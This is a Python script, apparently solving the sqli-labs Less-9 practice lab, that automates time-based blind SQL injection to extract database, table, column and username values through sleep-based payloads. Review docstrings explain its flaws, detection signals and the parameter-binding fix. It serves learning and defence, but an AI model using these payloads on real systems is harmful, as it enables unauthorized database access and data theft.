Less9

Python代码如下

import requests
from time import sleep,time
import threading
from concurrent.futures import ThreadPoolExecutor

def database_lenth():
    """Infer the length of the current database name from response latency.

    For each candidate length ``i`` in 0..9 one GET request is sent whose
    ``id`` value carries ``if(LENGTH(database())={i},sleep(1),1)``.  A
    response that takes more than one second is treated as "condition
    true": the length is printed and returned.  If no candidate matches the
    function falls off the end and returns None.

    NOTE(review): the only signal used is wall-clock time, so any server or
    network delay above one second is indistinguishable from a true
    condition (the file's own comments mention timing flakiness).  From the
    defender's side the observable pattern is a burst of requests to the
    same endpoint whose ``id`` parameter contains ``sleep(``/``if(`` and
    whose latencies cluster at the injected delay; the fix on the server is
    to bind ``id`` as a query parameter instead of concatenating it, which
    removes the oracle entirely.
    """
    for i in range(10):
        url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(LENGTH(database())={i},sleep(1),1)--+"
        start_time = time()
        # Only the elapsed time is inspected; the response body is never read.
        res = requests.get(url=url)
        used_time = time() - start_time
        # print(used_time)
        if(used_time > 1):  # threshold equals the injected sleep(1); jitter can cross it
            print("数据库长度为" + str(i))
            return i

def database_name():
    """Recover the current database name one character at a time by timing.

    Positions 1..8 of ``database()`` are probed; for each position every
    ASCII code in 65..122 is tried with ``sleep(1)`` as the true branch, and
    a response slower than one second appends ``chr(i)`` to ``s``.  The
    assembled string is printed; nothing is returned.

    Behaviour to be aware of:
    - there is no early exit, so every position costs the full 58 requests
      regardless of when (or whether) a match occurs;
    - characters whose code lies outside 65..122 are never tested and are
      silently absent from the printed result;
    - the 1-second threshold is the same one the file elsewhere notes as
      unreliable, so a single slow response adds a spurious character.

    NOTE(review): the request volume (8 x 58 near-identical GETs with a
    ``sleep(`` payload) is the detection signal a WAF or access-log monitor
    should key on; parameterizing ``id`` on the server removes the oracle.
    """
    s = ''
    for j in range(1,9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select database()),{j},1))={i},sleep(1),1)--+"
            start_time = time()
            res = requests.get(url=url)  # body unused; only elapsed time matters
            used_time = time() - start_time
            if(used_time > 1):
                s = s + chr(i)
    print(s)

def table_lenth():
    """Infer the name length of the first five tables in the current schema.

    For table index ``j`` in 0..4 and candidate length ``i`` in 1..19 one
    request is sent whose payload compares
    ``length(... limit {j},1)`` with ``i`` and sleeps 2 seconds when equal.
    A response slower than two seconds records ``(j, i)``; the running list
    is printed after every hit.

    Returns:
        dict mapping table index -> inferred length.  Because the list is
        converted with ``dict()``, a later hit for the same ``j`` (e.g. a
        timing false positive) overwrites an earlier one.  Indices with no
        hit are simply missing from the dict.

    NOTE(review): the response body is never inspected; the oracle is
    purely latency-based, so the same caveats about jitter apply as for the
    other probes in this file.
    """
    lenths = []
    for j in range(5):
        for i in range(1, 20):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {j},1))={i},sleep(2),1)--+"
            start_time = time()
            res = requests.get(url=url)
            used_time = time() - start_time
            if(used_time > 2):  # threshold equals the injected sleep(2)
                # print("table " + str(j) + " has length " + str(i))
                lenths.append((j,i))
                print(lenths)  # progress output: prints the whole list on every hit
    return dict(lenths)

def table_name():  # small timing issue (author's note)
    """Recover the names of the first four tables in the current schema.

    For each table index ``j`` in 0..3 a fresh string ``s`` is built by
    probing positions 0..8 of the table name; for each position every ASCII
    code in 65..122 is tried with ``sleep(2)`` as the true branch, and a
    response taking at least two seconds appends ``chr(i)``.  Each
    recovered name is printed; nothing is returned.

    The length probe ``table_lenth()`` is not used here (the call is
    commented out), so a fixed window of nine positions is scanned for
    every table regardless of its real length.

    NOTE(review): the threshold here is ``>= 2`` rather than the strict
    ``> 2`` used in ``table_lenth()``; both compare against the same
    injected delay, so a slow-but-unaffected response near the threshold
    still yields a false character.  Same detection/mitigation notes as the
    other probes apply: the ``sleep(`` payload in ``id`` and the request
    burst are the observable; server-side parameter binding is the fix.
    """
    # a = table_lenth()
    for j in range(4):
        s = ''
        for site in range(9):
            for i in range(65, 123):
                url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {j},1),{site},1))={i},sleep(2),1)--+"
                start_time = time()
                res = requests.get(url=url)  # body unused; only elapsed time matters
                used_time = time() - start_time
                if(used_time >= 2):
                    s = s + chr(i)
        print(s)

def column_name():  # small timing issue; sleeping 5 s and checking for >= 4 s gave correct results (author's note)
    """Recover the first column name of the hard-coded ``users`` table.

    Positions 0..8 of ``column_name`` (``limit 0,1`` -> first column) are
    probed; for each position every ASCII code in 65..122 is tried with
    ``sleep(5)`` as the true branch, and a response taking at least four
    seconds appends ``chr(i)`` to ``s``.  The result is printed; nothing is
    returned.

    The 1-second gap between the injected delay (5) and the threshold (4)
    is the author's workaround for timing noise noted elsewhere in this
    file; it makes a hit more robust to jitter at the cost of a slower scan
    (9 x 58 requests, each at least 5 s when the condition is true).

    NOTE(review): the table name is a string literal baked into the
    payload, so this function only works for a schema that actually has a
    ``users`` table — it does not consult ``table_name()``.
    """
    # a = table_lenth()
    s = ''
    for site in range(9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),{site},1))={i},sleep(5),1)--+"
            start_time = time()
            res = requests.get(url=url)  # body unused; only elapsed time matters
            used_time = time() - start_time
            if(used_time >= 4):  # deliberately below the injected sleep(5) to tolerate jitter
                s = s + chr(i)
    print(s)

def data():
    """Recover the first ``username`` value from the hard-coded ``users`` table.

    Positions 0..8 of ``(select username from users limit 0,1)`` are
    probed; for each position every ASCII code in 65..122 is tried with
    ``sleep(5)`` as the true branch, and a response taking at least four
    seconds appends ``chr(i)`` to ``s``.  The result is printed; nothing is
    returned.

    This is the only probe invoked from ``__main__``; the others are
    commented out there.  Structure and thresholds mirror
    ``column_name()`` exactly (5-second injected delay, 4-second decision
    threshold), so the same jitter/volume caveats apply.

    NOTE(review): characters outside ASCII 65..122 (digits, most
    punctuation) are never tested and will be missing from the printed
    value — a practitioner reading the output should treat it as a
    partial reconstruction, not a verified string.
    """
    s = ''
    for site in range(9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),{site},1))={i},sleep(5),1)--+"
            start_time = time()
            res = requests.get(url=url)  # body unused; only elapsed time matters
            used_time = time() - start_time
            if(used_time >= 4):  # deliberately below the injected sleep(5) to tolerate jitter
                s = s + chr(i)
    print(s)

if __name__ == "__main__":
    # Script entry point: each probe is run by hand by uncommenting it.
    # Only data() is active as published; the earlier stages are left
    # commented out.  Note that threading / ThreadPoolExecutor are imported
    # at the top of the file but nothing here uses them — every probe runs
    # its requests sequentially.
    # database_lenth()
    # database_name()
    # table_name()
    # column_name()
    data()

